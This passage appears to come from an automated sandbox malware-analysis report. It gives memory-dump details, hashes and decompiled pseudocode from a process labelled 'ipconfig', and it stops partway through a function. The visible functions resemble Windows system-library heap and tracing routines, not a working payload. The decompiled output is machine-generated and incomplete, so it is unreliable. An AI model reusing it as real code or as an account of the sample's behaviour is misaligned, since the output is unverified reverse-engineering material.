              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction ID: 8ddd475d94877fbdf832df8cf1949344d17e8cc5f477892c1a33016f38466c39
              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction Fuzzy Hash: F7218E71A40205EFDB21DF59C944AAAF7F8EF54754F15C86AEA49A7201D330ED01CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC3B7A Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E02EC3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x2f884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x2f884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2f884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E02EDAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E02EDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2f884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x2f884c4; // 0x0
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












              0x02ec3b89
              0x02ec3b96
              0x02ec3ba1
              0x02ec3bab
              0x02ec3bb5
              0x02ec3bb9
              0x02f06298
              0x02ec3bbf
              0x02ec3bc2
              0x02ec3bc3
              0x02ec3bc9
              0x02ec3bca
              0x02ec3bcc
              0x02ec3bcd
              0x02ec3bd4
              0x02ec3bd6
              0x02ec3bdb
              0x02ec3bea
              0x02ec3bf7
              0x02ec3bfb
              0x02ec3bff
              0x02ec3c09
              0x02ec3c0a
              0x02ec3c0b
              0x02ec3c0f
              0x02ec3c14
              0x02ec3c18
              0x02ec3c18
              0x02ec3bfb
              0x02ec3c1b
              0x02ec3c30
              0x02ec3c30
              0x02ec3c3d

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 882c1f754af0dc89a6637538f67b7cc91184b4ea5c447cf024aa42394626d0bf
              • Instruction ID: c37d5b929047fb6a8ae0b0a73734e5b1d633629d6e41d73e3c181bf19214aa1e
              • Opcode Fuzzy Hash: 882c1f754af0dc89a6637538f67b7cc91184b4ea5c447cf024aa42394626d0bf
              • Instruction Fuzzy Hash: B721A172A40118AFC700DF98CE81FAAB7AEFB44348F2550A9E9049B251C371AD52CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F16CF0 Relevance: .1, Instructions: 74COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E02F16CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E02EB7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E02EB7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2e75c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E02ECF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E02ECF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E02F17016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L02EB2400( &_v52);
								}
								_t21 = L02EB2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















              0x02f16cfb
              0x02f16d00
              0x02f16d02
              0x02f16d06
              0x02f16d0a
              0x02f16d0e
              0x02f16d19
              0x02f16d2b
              0x02f16d1b
              0x02f16d24
              0x02f16d24
              0x02f16d33
              0x02f16d39
              0x02f16d46
              0x02f16d4f
              0x02f16d61
              0x02f16d51
              0x02f16d5a
              0x02f16d5a
              0x02f16d69
              0x02f16d6b
              0x02f16d6d
              0x02f16d6f
              0x02f16d6f
              0x02f16d74
              0x02f16d79
              0x02f16d7a
              0x02f16d7f
              0x02f16d82
              0x02f16d88
              0x02f16d89
              0x02f16d90
              0x02f16d94
              0x02f16da7
              0x02f16db1
              0x02f16db1
              0x02f16dbb
              0x02f16dbb
              0x02f16d90
              0x02f16d69
              0x02f16d46
              0x02f16dc6

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9a356ecde0cd970b4abab5f700680fa11468789117fb72eb48aaa318287d87e
              • Instruction ID: 4504e347273e662df123a0565f5f8ab2d2203366686b01f0f67f05e88e796ea9
              • Opcode Fuzzy Hash: c9a356ecde0cd970b4abab5f700680fa11468789117fb72eb48aaa318287d87e
              • Instruction Fuzzy Hash: C52104729003459BC312EF6AC944BABB7EDEF82784F44485AFE41C7250E734D909CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F6070D Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E02F6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E02F607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E02F5AFDE( &_v8,  &_v12);
					E02F61293(_t38, _v28, _t60);
					if(E02EB7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E02F514FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













              0x02f6071b
              0x02f60724
              0x02f60734
              0x02f60738
              0x02f6074b
              0x02f6074b
              0x02f60753
              0x02f60753
              0x02f60759
              0x02f6075d
              0x02f60774
              0x02f60779
              0x02f6077d
              0x02f60789
              0x02f60795
              0x02f607a7
              0x02f60797
              0x02f607a0
              0x02f607a0
              0x02f607af
              0x02f607c4
              0x02f607cd
              0x02f607cd
              0x02f607af
              0x02f607dc

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction ID: dd9b5af3101a2fa070e39e5ed2e8731fc2407a1c33fc78f25a82b8a2a3e513fe
              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction Fuzzy Hash: 9B21D0366042049FD705DF18C884B6ABBA6FBC4390F14866DFA958B385DB30D909CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBAE73 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E02EBAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E02EB7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E02EB7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E02EB7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E02EB7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E02F17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













              0x02ebae78
              0x02ebae7c
              0x02ebae7e
              0x02ebae81
              0x02ebae86
              0x02ebae8d
              0x02f02691
              0x02ebae93
              0x02ebae93
              0x02ebae93
              0x02ebae98
              0x02ebae9d
              0x02f026a2
              0x02f026b4
              0x02f026a4
              0x02f026ad
              0x02f026ad
              0x02f026b9
              0x00000000
              0x02f026bb
              0x00000000
              0x02f026bb
              0x02ebaea3
              0x02ebaea3
              0x02ebaea3
              0x02ebaeaa
              0x02f026c0
              0x02f026c9
              0x02f026c9
              0x02ebaeb3
              0x02f026d4
              0x02f026e1
              0x00000000
              0x00000000
              0x02f026e7
              0x02f026ee
              0x02f026f0
              0x02f026f9
              0x02f026f9
              0x02f02702
              0x02f02708
              0x02f02708
              0x02f0270b
              0x02f0270f
              0x02f02711
              0x02f02711
              0x02f02725
              0x02f02725
              0x00000000
              0x02ebaeb9
              0x02ebaeb9
              0x02ebaebf
              0x02ebaebf
              0x02ebaeb3

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction ID: 2b8ef8f25814319ca929db8eb38bbef26d5f9f9c9860c8386421c86bace3fa4d
              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction Fuzzy Hash: 1B212932A01684DFDB139B68C988BA677D9EF41384F0900B1EE048B7D2D734DC80DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F17794 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E02F17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x2f87b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E02EDF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E02EB7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E02ED9AE0();
					_t24 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













              0x02f17799
              0x02f1779a
              0x02f1779b
              0x02f177a3
              0x02f177ab
              0x02f177ae
              0x02f177b1
              0x02f177b1
              0x02f177bf
              0x02f177c4
              0x02f177c8
              0x02f177ce
              0x02f177d4
              0x02f177e0
              0x02f177e0
              0x02f177d6
              0x02f177d6
              0x02f177de
              0x00000000
              0x00000000
              0x02f177de
              0x02f177e5
              0x02f177f0
              0x02f177f3
              0x02f177f6
              0x02f177fd
              0x02f17800
              0x02f1780c
              0x02f17818
              0x02f1782b
              0x02f1781a
              0x02f17823
              0x02f17823
              0x02f17830
              0x02f17831
              0x02f17838
              0x02f1783d
              0x02f1783e
              0x02f1784f
              0x02f1784f
              0x02f1785a

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa612c4b5733f0cdcdcd43063edad13a079e2b8728e4a07329d94ab3742ddc2a
              • Instruction ID: 1f1e73d9a0a299fd11f6ede56cd88ab082239205214e9c1aed102f1ed79fbc5f
              • Opcode Fuzzy Hash: aa612c4b5733f0cdcdcd43063edad13a079e2b8728e4a07329d94ab3742ddc2a
              • Instruction Fuzzy Hash: 8121A172940604ABC725EF69DC90EABF7A9EF48390F10456DF60AC7750E734E900CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECFD9B Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E02ECFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E02EA76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










              0x02ecfd9b
              0x02ecfda0
              0x02ecfda1
              0x02ecfdab
              0x02ecfdad
              0x02ecfdb0
              0x02ecfdb8
              0x02ecfe0f
              0x02ecfde6
              0x02ecfde9
              0x02ecfdec
              0x02f0c0c0
              0x02ecfdfe
              0x02ecfe06
              0x02ecfe06
              0x02f0c0c8
              0x02ecfe2d
              0x02ecfe2d
              0x00000000
              0x02ecfe2d
              0x02f0c0d1
              0x02f0c0e0
              0x02f0c0e5
              0x02f0c0e5
              0x02f0c0e8
              0x00000000
              0x02f0c0e8
              0x02ecfdf4
              0x00000000
              0x00000000
              0x02ecfdf6
              0x02ecfdfa
              0x02ecfe1a
              0x02ecfe1f
              0x02ecfe1f
              0x02ecfdfc
              0x00000000
              0x02ecfdfc
              0x02ecfdcc
              0x02ecfdd0
              0x02ecfe26
              0x00000000
              0x02ecfe26
              0x02ecfdd8
              0x02ecfddb
              0x02ecfddd
              0x02ecfde0
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction ID: fedb832c7e05ef9d6f12ea853b1642dd16cd6425f0d749bfa54811d66898e98b
              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction Fuzzy Hash: F7217F72A80641DFC731CF89C640FA6F7E6EB95B14F24D16EE94987A11D7309C01DB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E99240 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E02E99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x2f6f708);
				E02EED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E02ED95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E02ED95D0();
				_t33 =  *0x2f884c4; // 0x0
				L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x2f884c4; // 0x0
				L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x2f884c4; // 0x0
				E02EB2280(L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2f886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E02ED95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E02ED95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E02E99325();
					_t50 =  *0x2f884c4; // 0x0
					return E02EED0D1(L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















              0x02e99240
              0x02e99242
              0x02e99247
              0x02e9924c
              0x02e9924e
              0x02e99255
              0x02e99257
              0x02e9925a
              0x02e9925f
              0x02e9925f
              0x02e99266
              0x02e99271
              0x02e99276
              0x02e99279
              0x02e9927e
              0x02e99295
              0x02e9929a
              0x02e992b1
              0x02e992b6
              0x02e992d7
              0x02e992dc
              0x02e992e0
              0x02e992e6
              0x02e992e8
              0x02e992ee
              0x02e99332
              0x02e99333
              0x02e99337
              0x02e99338
              0x02e9933a
              0x02e9933a
              0x02e9933d
              0x02e99342
              0x02e99342
              0x02e99345
              0x02e99349
              0x02e9934e
              0x02e99352
              0x02e99357
              0x02e992f4
              0x02e992f4
              0x02e992f6
              0x02e992f9
              0x02e99300
              0x02e99306
              0x02e99324
              0x02e99324

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 20368f6917f6e877f5a3df747cf77a3a501c38031561731c51517a4d539dfe61
              • Instruction ID: 728cb5138dbfd9fd79c951e777b04f2b707efc54861af0a1e77e5b905bd8bc8d
              • Opcode Fuzzy Hash: 20368f6917f6e877f5a3df747cf77a3a501c38031561731c51517a4d539dfe61
              • Instruction Fuzzy Hash: 96214A324C0644DFC722EF28CE00F5AB7BABF08744F54956DA14A87AA2C734E951CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECB390 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E02ECB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E02EB2280(_t12, 0x2f88608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E02ED00C2(0x2f88608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











              0x02ecb395
              0x02ecb3a2
              0x02ecb3a5
              0x02ecb3aa
              0x02ecb3b2
              0x02ecb3ba
              0x02ecb3bd
              0x02ecb3c0
              0x02ecb3c4
              0x02ecb3c9
              0x02f0a3e9
              0x02f0a3ed
              0x02f0a3f0
              0x02f0a3ff
              0x02f0a403
              0x02f0a409
              0x00000000
              0x00000000
              0x02f0a40b
              0x02f0a40b
              0x02f0a40f
              0x02f0a415
              0x02f0a423
              0x02f0a423
              0x02f0a415
              0x02ecb3d1
              0x02ecb3e8
              0x02ecb3e8
              0x02ecb3d9

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 272c4b3364c01aafbe2c191f363554c478f58fa3a2d6914af84cd15a69097856
              • Instruction ID: 1b832fd43114fc110751e0735043fb935b759da261427da850d533a3bb1862cf
              • Opcode Fuzzy Hash: 272c4b3364c01aafbe2c191f363554c478f58fa3a2d6914af84cd15a69097856
              • Instruction Fuzzy Hash: E21129377511109BCB299A588E81A6BB397EBC53B4B28912DEE169B280CA315C02CA94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F24257 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E02F24257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x2f708d0);
				E02EED08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E02F241E8(__ebx, __edi, __ecx, _t39);
				E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
